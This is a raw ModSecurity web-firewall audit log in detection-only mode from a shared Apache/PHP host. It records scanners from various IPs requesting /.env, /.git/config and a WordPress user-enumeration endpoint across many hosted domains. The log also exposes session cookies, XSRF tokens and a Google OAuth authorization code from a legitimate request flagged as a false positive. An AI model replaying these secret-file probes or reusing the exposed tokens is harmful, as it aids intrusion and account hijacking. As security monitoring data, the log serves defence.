combined=2826, p1=578, p2=2178, p3=0, p4=0, p5=69, sr=134, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cd9ff261-Z-- --03a1a136-A-- [24/Jul/2025:03:52:56.820242 +0300] aIGD6FooLYw4or2LgWLQxgAAAMs 93.152.210.212 36908 127.0.0.1 7081 --03a1a136-B-- GET /.env HTTP/1.0 Host: web.raqmix.net X-Real-IP: 93.152.210.212 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ASUS_I005DA Build/PI; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/133.0.6943.122 Mobile Accept: */* Accept-Encoding: gzip --03a1a136-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Set-Cookie: XSRF-TOKEN=eyJpdiI6IjV1TS9GVmtPSnlRemxMSzFMb2tDYVE9PSIsInZhbHVlIjoiVnc3QVBiTlFvMXR2S0dwbnVCL2cwL2E0K1VwZ0p6NnROTVRjQTY5YkRsaXc3S2owcnFRWHkzTGtiM2FCSDR5cWxEVU9DcElGMFZwSVRwZnd4OWxNUDBwd2x2VVJ3T3pZRW5pYkxSSkF2dUU2Q1Jhd2dmbDdOQlNRWlJVTTFzNHoiLCJtYWMiOiI1NjUyN2ZlOGQ5N2NiMzYwMzA5N2FiYzQ1NjJiNmNkY2FiODkzODViYTFjYzQ1Zjk0NzY3YTcyNDU1ZjQzMmZkIiwidGFnIjoiIn0%3D; expires=Thu, 24 Jul 2025 02:52:56 GMT; Max-Age=7200; path=/ Set-Cookie: raqweb_session=eyJpdiI6IktJRFJHcXNKZ1gxT01vZ3hPYnUxNEE9PSIsInZhbHVlIjoiY1psK1hzL3EzWWM3UTl1S1hNUko0U1lzaStSWGd6WDVuRkVlZVE3R0JyenpjdVVWMEJST1RjOHNEdEVMM1JBY3BsR09hMGV5TytCeFdYYlFMOEtlNkVmQjBaWFZDWE5aQW1ONEROa2ZzWXcwS2tRbm82Y1pUck50dXZVNC8vZ1YiLCJtYWMiOiJiYTY2OTE5MmFkNDYwMmYxZTBkMzIwZDFlMDQ1N2U4MjYwOWY0MGJlZDBkODA4MGIyNmJiMDk3MmYzMmNmNWI1IiwidGFnIjoiIn0%3D; expires=Thu, 24 Jul 2025 02:52:56 GMT; Max-Age=7200; path=/; httponly Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --03a1a136-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "web.raqmix.net"] [uri "/.env"] [unique_id "aIGD6FooLYw4or2LgWLQxgAAAMs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/web.raqmix.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753318376673913 146469 (- - -) Stopwatch2: 1753318376673913 146469; combined=2367, p1=550, p2=1739, p3=0, p4=0, p5=77, sr=200, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --03a1a136-Z-- --1f404a75-A-- [24/Jul/2025:04:12:07.626182 +0300] aIGIZ0dutIOpb_kg22guigAAABg 213.209.143.116 59052 127.0.0.1 7081 --1f404a75-B-- GET /.env HTTP/1.0 Host: www.sys.ellaith.com X-Real-IP: 213.209.143.116 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 accept-encoding: gzip --1f404a75-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Set-Cookie: csrf_cookie_name=b38e45d7f28251665a4b0218609141b2; expires=Thu, 24 Jul 2025 02:13:07 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --1f404a75-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sys.ellaith.com"] [uri "/.env"] [unique_id "aIGIZ0dutIOpb_kg22guigAAABg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sys.ellaith.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753319527558915 67370 (- - -) Stopwatch2: 1753319527558915 67370; combined=2693, p1=584, p2=1969, p3=0, p4=0, p5=139, sr=144, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1f404a75-Z-- --e09bb067-A-- [24/Jul/2025:05:06:11.740532 +0300] aIGVE1ooLYw4or2LgWJcDgAAAM0 101.99.88.163 45116 127.0.0.1 7081 --e09bb067-B-- GET /.git/config HTTP/1.0 Host: app.jinansystem.com X-Real-IP: 101.99.88.163 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 6.0; zh-CN; KNT-UL10 Build/HUAWEIKNT-UL10) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 Quark/3.0.2.943 Mobile Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --e09bb067-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.0.30 Cache-Control: no-cache, private Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --e09bb067-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "app.jinansystem.com"] [uri "/.git/config"] [unique_id "aIGVE1ooLYw4or2LgWJcDgAAAM0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/app.jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753322771599883 140806 (- - -) Stopwatch2: 1753322771599883 140806; combined=2728, p1=654, p2=1950, p3=0, p4=0, p5=123, sr=221, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e09bb067-Z-- --d44ca221-A-- [24/Jul/2025:05:10:09.348290 +0300] aIGWAVooLYw4or2LgWJjVQAAAMw 101.99.88.163 53272 127.0.0.1 7081 --d44ca221-B-- GET /.git/config HTTP/1.0 Host: college.jinansystem.com X-Real-IP: 101.99.88.163 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --d44ca221-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --d44ca221-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "college.jinansystem.com"] [uri "/.git/config"] [unique_id "aIGWAVooLYw4or2LgWJjVQAAAMw"] Stopwatch: 1753323009335737 12642 (- - -) Stopwatch2: 1753323009335737 12642; combined=10552, p1=8775, p2=1706, p3=0, p4=0, p5=70, sr=155, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d44ca221-Z-- --87a99221-A-- [24/Jul/2025:05:14:47.755056 +0300] aIGXF1ooLYw4or2LgWJrtQAAAM8 78.40.176.204 39684 127.0.0.1 7081 --87a99221-B-- GET /administration/index.php?code=4/0AVMBsJhRPfN5NuqxmgOdhsfckEb7Ax2_aLJEfYnt-1A4NVc3D4QpOoBdL34FJIQlTdAGBg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 78.40.176.204 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?1 sec-ch-ua-platform: "Android" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8,tr;q=0.7 priority: u=0, i cookie: PHPSESSID=n0saojiat1sucl3s3ri0n86kb6 --87a99221-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --87a99221-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIGXF1ooLYw4or2LgWJrtQAAAM8"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753323287342101 413204 (- - -) Stopwatch2: 1753323287342101 413204; combined=8796, p1=568, p2=7673, p3=314, p4=102, p5=138, sr=177, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --87a99221-Z-- --edf34a44-A-- [24/Jul/2025:05:19:51.288899 +0300] aIGYR1ooLYw4or2LgWJzJwAAAMY 45.61.161.124 58408 127.0.0.1 7081 --edf34a44-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: first-builders.com X-Real-IP: 45.61.161.124 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Cache-Control: max-age=0 Pragma: no-cache Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Cookie: wordpress_test_cookie=WP%20Cookie%20check --edf34a44-F-- HTTP/1.1 503 Service Unavailable X-Powered-By: PHP/8.3.23 Retry-After: 600 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=utf-8 --edf34a44-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||first-builders.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||first-builders.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "first-builders.com"] [uri "/wp-json/wp/v2/users"] [unique_id "aIGYR1ooLYw4or2LgWJzJwAAAMY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/first-builders.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753323591274286 14879 (- - -) Stopwatch2: 1753323591274286 14879; combined=5830, p1=653, p2=5004, p3=0, p4=0, p5=173, sr=188, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --edf34a44-Z-- --16999c3f-A-- [24/Jul/2025:05:22:53.365731 +0300] aIGY_VooLYw4or2LgWJ5lQAAAM8 86.195.113.198 34092 127.0.0.1 7081 --16999c3f-B-- GET /.env HTTP/1.0 Host: crm.kime.agency X-Real-IP: 86.195.113.198 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --16999c3f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Set-Cookie: csrf_cookie_name=00ea84e42a247294b7b815dc8fb5896a; expires=Thu, 24 Jul 2025 03:23:53 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --16999c3f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "crm.kime.agency"] [uri "/.env"] [unique_id "aIGY_VooLYw4or2LgWJ5lQAAAM8"] Apache-Handler: proxy:unix:/var/www/vhosts/system/crm.kime.agency/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753323773281080 84765 (- - -) Stopwatch2: 1753323773281080 84765; combined=14951, p1=13343, p2=1488, p3=0, p4=0, p5=119, sr=815, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --16999c3f-Z-- --ef05023f-A-- [24/Jul/2025:05:28:49.267737 +0300] aIGaYUdutIOpb_kg22h0-AAAAAk 101.99.88.163 38126 127.0.0.1 7081 --ef05023f-B-- GET /.git/config HTTP/1.0 Host: test.jinansystem.com X-Real-IP: 101.99.88.163 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 YaBrowser/19.3.1.828 Yowser/2.5 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --ef05023f-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --ef05023f-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.jinansystem.com"] [uri "/.git/config"] [unique_id "aIGaYUdutIOpb_kg22h0-AAAAAk"] Stopwatch: 1753324129263528 4298 (- - -) Stopwatch2: 1753324129263528 4298; combined=2476, p1=488, p2=1853, p3=0, p4=0, p5=135, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ef05023f-Z-- --9cc9f14f-A-- [24/Jul/2025:05:29:45.122731 +0300] aIGamVooLYw4or2LgWKHsAAAAMw 185.177.72.144 42362 127.0.0.1 7081 --9cc9f14f-B-- GET /.git/config HTTP/1.0 Host: en.verozone.md X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9cc9f14f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.23 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 6514 Content-Type: text/html; charset=UTF-8 --9cc9f14f-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "en.verozone.md"] [uri "/.git/config"] [unique_id "aIGamVooLYw4or2LgWKHsAAAAMw"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Deprecated: Optional parameter $level declared before required parameter $message is implicitly treated as a required parameter in /var/www/vhosts/verozone.md/en.verozone.md/system/core/Common.php on line 350' Apache-Handler: proxy:unix:/var/www/vhosts/system/en.verozone.md/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753324185072841 50025 (- - -) Stopwatch2: 1753324185072841 50025; combined=2821, p1=586, p2=1903, p3=0, p4=0, p5=332, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9cc9f14f-Z-- --9572de14-A-- [24/Jul/2025:05:30:49.302975 +0300] aIGa2FooLYw4or2LgWKJsgAAAMo 185.177.72.9 49762 127.0.0.1 7081 --9572de14-B-- GET /.git/config HTTP/1.0 Host: crm.raqmix.net X-Real-IP: 185.177.72.9 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9572de14-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Set-Cookie: csrf_cookie_name=b8ead4997b7586f862c0e24aa4781ee3; expires=Thu, 24 Jul 2025 03:31:49 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --9572de14-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "crm.raqmix.net"] [uri "/.git/config"] [unique_id "aIGa2FooLYw4or2LgWKJsgAAAMo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/crm.raqmix.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753324248990353 312726 (- - -) Stopwatch2: 1753324248990353 312726; combined=2746, p1=505, p2=2127, p3=0, p4=0, p5=114, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9572de14-Z-- --74545a0d-A-- [24/Jul/2025:05:32:08.530169 +0300] aIGbKEdutIOpb_kg22h3cQAAABU 185.177.72.144 56174 127.0.0.1 7081 --74545a0d-B-- GET /.git/config HTTP/1.0 Host: internetlb.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --74545a0d-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 12 Dec 2016 17:20:28 GMT ETag: "405-5437951ed94a5" Accept-Ranges: bytes Content-Length: 1029 Content-Type: text/html --74545a0d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "internetlb.com"] [uri "/.git/config"] [unique_id "aIGbKEdutIOpb_kg22h3cQAAABU"] Stopwatch: 1753324328525771 4555 (- - -) Stopwatch2: 1753324328525771 4555; combined=2600, p1=520, p2=1973, p3=0, p4=0, p5=107, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --74545a0d-Z-- --98f7750f-A-- [24/Jul/2025:05:32:15.302890 +0300] aIGbL1ooLYw4or2LgWKLhgAAAMM 185.177.72.144 55654 127.0.0.1 7081 --98f7750f-B-- GET /.git/config HTTP/1.0 Host: itilebanon.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --98f7750f-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2014 11:29:50 GMT ETag: "3bf-4feeec6556780" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --98f7750f-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "itilebanon.com"] [uri "/.git/config"] [unique_id "aIGbL1ooLYw4or2LgWKLhgAAAMM"] Stopwatch: 1753324335297941 5065 (- - -) Stopwatch2: 1753324335297941 5065; combined=2539, p1=515, p2=1864, p3=0, p4=0, p5=159, sr=135, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --98f7750f-Z-- --cf280111-A-- [24/Jul/2025:05:32:26.199738 +0300] aIGbOlooLYw4or2LgWKMCgAAAMg 185.177.72.144 50178 127.0.0.1 7081 --cf280111-B-- GET /.git/config HTTP/1.0 Host: jinansystem.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --cf280111-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --cf280111-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "jinansystem.com"] [uri "/.git/config"] [unique_id "aIGbOlooLYw4or2LgWKMCgAAAMg"] Stopwatch: 1753324346194817 5031 (- - -) Stopwatch2: 1753324346194817 5031; combined=2894, p1=629, p2=2174, p3=0, p4=0, p5=90, sr=174, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cf280111-Z-- --a7ae2521-A-- [24/Jul/2025:05:36:11.211828 +0300] aIGcF0dutIOpb_kg22h7OAAAAAY 185.177.72.9 33042 127.0.0.1 7081 --a7ae2521-B-- GET /.git/config HTTP/1.0 Host: hrmdemo.raqmix.cloud X-Real-IP: 185.177.72.9 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: 